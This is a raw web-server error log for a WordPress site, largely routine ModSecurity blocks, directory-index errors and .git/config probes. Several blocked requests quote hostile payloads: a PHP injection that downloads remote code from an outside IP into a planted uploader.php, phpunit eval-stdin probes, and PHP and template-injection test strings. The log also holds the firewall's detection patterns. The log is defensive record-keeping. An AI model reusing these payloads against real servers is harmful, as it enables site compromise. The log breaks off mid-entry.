(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 02 05:57:44.585629 2023] [autoindex:error] [pid 4882:tid 140339021063936] [client 20.125.151.118:57942] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 02 08:02:02.499505 2023] [autoindex:error] [pid 4882:tid 140339054634752] [client 49.51.199.181:34434] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 02 19:00:49.363770 2023] [:error] [pid 4882:tid 140338987493120] [client 5.188.62.76:38646] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFGkMc2Wn5PZF8dWpDMeVAAAAQw"] [Tue May 02 21:08:12.842164 2023] [:error] [pid 4763:tid 140339150878464] [client 5.188.62.140:43726] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFHCDIcfuvAqMwmxXh4CWgAAAIE"] [Wed May 03 02:41:51.081249 2023] [autoindex:error] [pid 4882:tid 140338995885824] [client 20.168.66.0:59940] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 03 05:51:56.370211 2023] [autoindex:error] [pid 7881:tid 139908054857472] [client 43.135.167.80:39542] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 03 19:16:30.758549 2023] [:error] [pid 7881:tid 139908063250176] [client 5.188.62.21:51868] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFL5XqAsEfpjGOlvJsVdmQAAAEA"] [Wed May 03 19:21:25.186864 2023] [:error] [pid 7882:tid 139907804616448] [client 5.188.62.174:52204] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFL6hYAr2iEc202hS7fnzwAAAJY"] [Wed May 03 19:21:25.577310 2023] [:error] [pid 7880:tid 139908054857472] [client 5.188.62.174:52206] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFL6hTp3w1sQTMRZwA0tXgAAAAE"] [Wed May 03 19:25:15.784080 2023] [:error] [pid 7880:tid 139907913721600] [client 5.188.62.26:52326] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFL7azp3w1sQTMRZwA0taQAAAAk"] [Wed May 03 19:25:15.996496 2023] [:error] [pid 7881:tid 139907838187264] [client 5.188.62.26:52328] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFL7a6AsEfpjGOlvJsVd5gAAAFI"] [Wed May 03 19:46:35.338265 2023] [:error] [pid 8331:tid 139907854972672] [client 5.188.62.76:53136] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFMAa9qqYpU0k8iWp5hlqAAAANA"] [Wed May 03 20:54:27.393970 2023] [:error] [pid 7881:tid 139907838187264] [client 5.188.62.76:55760] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFMQU6AsEfpjGOlvJsVfOQAAAFI"] [Wed May 03 22:01:34.261398 2023] [:error] [pid 8331:tid 139907871758080] [client 5.188.62.140:58796] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFMgDtqqYpU0k8iWp5hp2AAAAM4"] [Thu May 04 00:33:42.616367 2023] [autoindex:error] [pid 7881:tid 139907955685120] [client 139.59.123.73:35956] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Thu May 04 06:21:17.005201 2023] [autoindex:error] [pid 29517:tid 140226378819328] [client 20.198.118.83:54248] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/05/04 14:04:40 [error] 29445#29445: *679979 access forbidden by rule, client: 13.56.251.18, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/05/04 14:24:39 [error] 29445#29445: *680715 access forbidden by rule, client: 13.56.251.18, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/05/04 15:37:07 [error] 29445#29445: *683705 access forbidden by rule, client: 140.228.29.139, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu May 04 22:30:32.971786 2023] [:error] [pid 29515:tid 140226538084096] [client 5.188.62.76:42882] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFR4WNzmm_oLuCkDyAauIQAAAAQ"] [Thu May 04 23:18:04.570512 2023] [:error] [pid 29515:tid 140226311677696] [client 5.188.62.140:45020] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFSDfNzmm_oLuCkDyAautAAAABY"] [Fri May 05 02:16:59.877718 2023] [:error] [pid 29811:tid 140226294892288] [client 178.159.37.41:53276] [client 178.159.37.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZFSta9_Fvi5U__kAGWsBSwAAANg"], referer: www.google.com [Fri May 05 05:08:36.876644 2023] [autoindex:error] [pid 11443:tid 140499990050560] [client 43.135.135.189:33732] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri May 05 05:35:49.969394 2023] [autoindex:error] [pid 11010:tid 140499931301632] [client 89.33.44.247:34752] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 06 03:41:23.024683 2023] [ssl:warn] [pid 25205:tid 140228390262656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 06 03:41:23.153026 2023] [ssl:warn] [pid 25206:tid 140228390262656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 06 03:41:23.498057 2023] [ssl:warn] [pid 25206:tid 140228390262656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 06 03:41:25.718208 2023] [ssl:warn] [pid 25206:tid 140228390262656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 06 03:41:28.038827 2023] [ssl:warn] [pid 25716:tid 140086632986496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 06 03:41:28.154125 2023] [ssl:warn] [pid 25717:tid 140086632986496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 06 06:40:06.429288 2023] [autoindex:error] [pid 25742:tid 140086427186944] [client 20.125.112.145:42618] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 06 11:11:13.735055 2023] [autoindex:error] [pid 26175:tid 140086196762368] [client 49.51.199.173:53874] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 06 13:44:12.345462 2023] [:error] [pid 25744:tid 140086427186944] [client 5.188.62.174:35546] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFaf_B7OYaUYcGp03daZIQAAAIM"] 2023/05/06 17:20:07 [error] 25603#25603: *787240 access forbidden by rule, client: 91.240.118.252, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat May 06 18:52:42.466561 2023] [:error] [pid 25744:tid 140086289082112] [client 5.188.62.26:48434] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFboSh7OYaUYcGp03daeZgAAAIs"] [Sat May 06 21:05:21.142431 2023] [:error] [pid 25743:tid 140086443972352] [client 5.188.62.76:55688] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFcHYbpmAoAc3hywy-uRhAAAAEE"] [Sun May 07 03:32:18.628109 2023] [ssl:warn] [pid 4122:tid 140695124957056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 07 03:32:18.753974 2023] [ssl:warn] [pid 4123:tid 140695124957056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 07 03:32:19.242009 2023] [ssl:warn] [pid 4123:tid 140695124957056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 07 03:32:20.939245 2023] [ssl:warn] [pid 4123:tid 140695124957056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 07 03:32:23.368692 2023] [ssl:warn] [pid 4570:tid 139812517504896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 07 03:32:23.491775 2023] [ssl:warn] [pid 4571:tid 139812517504896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 07 06:38:32.864543 2023] [:error] [pid 4592:tid 139812216481536] [client 45.61.184.17:33240] [client 45.61.184.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZFeNuNg-4TTO0YMBTMkbywAAAEY"] [Sun May 07 06:38:33.732196 2023] [:error] [pid 4788:tid 139812140947200] [client 45.61.184.17:33242] [client 45.61.184.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:content. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:content: <php>die(md5(cvbytigdfgfdg))</php>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZFeNuYdcaXpEuS1TE1nzEwAAAM8"] [Sun May 07 06:52:33.696106 2023] [:error] [pid 4788:tid 139812149339904] [client 45.61.184.17:33868] [client 45.61.184.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:?>"|utmccn. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZFeRAYdcaXpEuS1TE1nzigAAAM4"], referer: https://www.google.com/"<?=print(9347655345-4954366);?>" [Sun May 07 06:52:36.741919 2023] [:error] [pid 4593:tid 139812182910720] [client 45.61.184.17:33874] [client 45.61.184.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:?>'|utmccn. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZFeRBM5_9dmn1LuIdsooMwAAAIo"], referer: https://www.google.com/'<?=print(9347655345-4954366);?>' [Sun May 07 06:52:39.658595 2023] [:error] [pid 4788:tid 139812124161792] [client 45.61.184.17:33878] [client 45.61.184.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS_NAMES:'{${print(9347655345-4954366)}}'. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: '{${print(9347655345-4954366) found within ARGS_NAMES:'{${print(9347655345-4954366)}}': '{${print(9347655345-4954366)}}'"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZFeRB4dcaXpEuS1TE1nzjAAAANE"], referer: https://www.google.com/'{${print(9347655345-4954366)}}' [Sun May 07 06:52:42.695991 2023] [:error] [pid 4591:tid 139812140947200] [client 45.61.184.17:33880] [client 45.61.184.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS_NAMES:"{${print(9347655345-4954366)}}". [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22{${print(9347655345-4954366) found within ARGS_NAMES:\\x22{${print(9347655345-4954366)}}\\x22: \\x22{${print(9347655345-4954366)}}\\x22"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZFeRCiCjG3JT8_XFk1YvTwAAAA8"], referer: https://www.google.com/"{${print(9347655345-4954366)}}" [Sun May 07 08:28:55.001003 2023] [:error] [pid 4591:tid 139812115769088] [client 5.188.62.26:37884] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver 